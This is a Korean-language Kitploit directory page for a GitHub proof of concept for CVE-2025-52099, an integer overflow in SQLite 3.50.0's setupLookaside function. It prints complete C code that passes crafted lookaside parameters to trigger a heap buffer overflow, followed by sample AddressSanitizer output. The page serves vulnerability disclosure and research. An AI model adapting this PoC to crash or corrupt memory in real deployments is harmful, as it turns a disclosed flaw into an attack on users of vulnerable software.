Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-52099 — CVE-2025-52099에 대한 개념 증명(PoC)으로, SQLite 3.50.0의 setupLookaside 함수에서 발생하는 정수 오버플로우로 인해 힙 버퍼 오버플로우(heap-buffer-overflow)로 이어지는 취약점입니다. | Kitploit
도구/GitHubGitHub/screambby/cve-2025-52099
Vulnerability AnalysisCode AnalysisExploitationFuzzingBinary Analysis
GitHubscreambby/cve-2025-52099

CVE-2025-52099

CVE-2025-52099에 대한 개념 증명(PoC)으로, SQLite 3.50.0의 setupLookaside 함수에서 발생하는 정수 오버플로우로 인해 힙 버퍼 오버플로우(heap-buffer-overflow)로 이어지는 취약점입니다.

저장소 보기
10개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-52099

SQLite 3.50.0의 정수 오버플로우 SQLite 3.50.0의 setupLookaside 함수에서 정수 오버플로우를 트리거하는 개념 증명(PoC) 코드가 아래에 제공됩니다. 이 오버플로우는 sz * nBig의 검사되지 않은 곱셈으로 인해 발생하며, 이 값이 음수로 감싸져 잘못된 메모리 쓰기를 초래할 수 있습니다.

테스트 환경: Ubuntu 22.04 x86_64, SQLite 3.50.0(직접 빌드)

PoC 코드(C):

#include <stdio.h> #include <sqlite3.h>

int main() { sqlite3 *db;

root@kitploit:~
// Open SQLite database
if (sqlite3_open("test.db", &db)) {
    fprintf(stderr, "Can't open database: %s\n", sqlite3_errmsg(db));
    return 1;
}

// Malicious lookaside configuration
// sz = 140, cnt = 1979733333
// This causes internal sz * nBig to overflow and produces negative nSm
int rc = sqlite3_db_config(db, SQLITE_DBCONFIG_LOOKASIDE, NULL, 140, 1979733333);
if (rc != SQLITE_OK) {
    fprintf(stderr, "Failed to configure lookaside: %d\n", rc);
    return 2;
} else {
    printf("[+] Lookaside configured\n");
}

// Create table and perform many inserts to exercise corrupted lookaside pool
sqlite3_exec(db, "CREATE TABLE test(id INTEGER);", NULL, NULL, NULL);

for (int i = 0; i < 100000; i++) {
    char sql[64];
    snprintf(sql, sizeof(sql), "INSERT INTO test(id) VALUES(%d);", i);
    sqlite3_exec(db, sql, NULL, NULL, NULL);
}

printf("[+] Insert finished. Closing DB.\n");
sqlite3_close(db);
return 0;

}

이 PoC를 AddressSanitizer(-fsanitize=address)로 컴파일하면 잘못된 lookaside 슬롯 구성으로 인해 힙 버퍼 오버플로우가 발생합니다.

ASAN으로 관찰된 출력:

==12345==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000f000 ... READ of size 8 at 0x60200000f000 thread T0 ...

도구 다운로드